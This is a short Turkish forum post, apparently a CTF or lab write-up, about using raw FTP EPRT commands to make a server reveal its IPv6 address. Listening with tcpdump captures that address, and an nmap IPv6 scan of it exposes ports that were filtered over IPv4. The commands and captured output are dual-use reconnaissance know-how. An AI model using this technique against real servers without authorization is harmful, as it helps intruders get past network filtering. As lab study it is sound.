• 18-09-2020, 02:16:04
    #1
    Geçenlerde rastladım gerçekten baya uğraşmıştım,yaklaşık 11 saat boyunca uğraştıktan sonra rootlamayı başardım sistemi . ilk başta misafir ftp verildi portlar tarandığında bulunan bir kaç portun filtrelenmiş olduğunu farkettim RFC2428 yi kontrol ettiğimde ipv6 üzerinde çalıştığını farkettim ve ipv6 yı alarak verilen portu tekrar taradığımda portların açık olduğunu farkettim sonrasında kullanıcılardan birisine girerek root için çalışmaya başladım , bakalım ipv6 yı nasıl çekmişim gelin;

    Kod:
    ftp> quote EPRT |1|serverip|2222|
    burda quote kullanma sebebim yine bypass EPRT kullandığımda komut hatası yiyordum ama quote sayesinde çalışıyor

    Kod:
    ftp> quote EPRT |2|fe80::13ed:7f5f:****:45eb|2222|
    buraya kendi inset6 adresimi yazıyorum dinlemeye alabilmek için

    Kod:
    ftp> quote EPRT |1|serverip|2222
    tekrardan |1| değişkenine yolluyorum

    Kod:
     ftp> quote EPRT |2|dead:beef:2::10--|2222
    ardından inset6 da |2| yi yolluyorum

    ve başka bir terminalde

    Kod:
    tcpdump -lni tun0 -vvvvvvv ip6
    yazarak dinlemeye alıyorum

    Kod:
    quote LIST
    diyorum ve tcp dumpta gelen değerleri inceliyorum

    tcpdump: listening on tun0, link-type RAW (Raw IP), capture size 262144 bytes
    15:30:42.486368 IP6 (flowlabel 0xb53b6, hlim 63, next-header TCP (6) payload length: 40) dead:beef::***:56ff:febd:5277.33702 > dead:beef:2::10ab.2222: Flags

    ve ipv adresini aldık nmap -6 parametresi ile ipv6 taradığımızda filtreli portları açık olarak görmemiz an meselesidir